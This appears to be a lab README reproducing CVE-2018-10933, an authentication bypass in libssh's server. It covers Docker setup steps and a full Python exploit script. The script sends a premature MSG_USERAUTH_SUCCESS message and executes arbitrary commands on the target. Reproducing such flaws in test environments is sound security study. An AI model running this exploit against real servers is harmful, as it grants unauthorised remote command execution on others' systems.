# libssh Authentication Bypass Vulnerability(CVE-2018-10933) [中文版本(Chinese version)](README.zh-cn.md) libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the `MSG_USERAUTH_SUCCESS` message before the authentication succeed. That can bypass the authentication and access the target SSH server. References: - https://www.libssh.org/security/advisories/CVE-2018-10933.txt - https://www.seebug.org/vuldb/ssvid-97614 ## Setup Start the environment: ``` docker compose up -d ``` After the environment is started, we can connect the `your-ip:2222` port (account password: `myuser:mypassword`), which is a legal ssh login: ![](1.png) ## Exploit Referring to the POC given in https://www.seebug.org/vuldb/ssvid-97614, we can use the following script to proof the vulnerability. ```python #!/usr/bin/env python3 import sys import paramiko import socket import logging logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) bufsize = 2048 def execute(hostname, port, command): sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.exec_command(command) # stdin = client.makefile("wb", bufsize) stdout = client.makefile("rb", bufsize) stderr = client.makefile_stderr("rb", bufsize) output = stdout.read() error = stderr.read() stdout.close() stderr.close() return (output+error).decode() except paramiko.SSHException as e: logging.exception(e) logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") except socket.error: logging.debug("Unable to connect.") return None if __name__ == '__main__': print(execute(sys.argv[1], sys.argv[2], sys.argv[3])) ``` You can execute arbitrary commands on the target server like following: ![](2.png)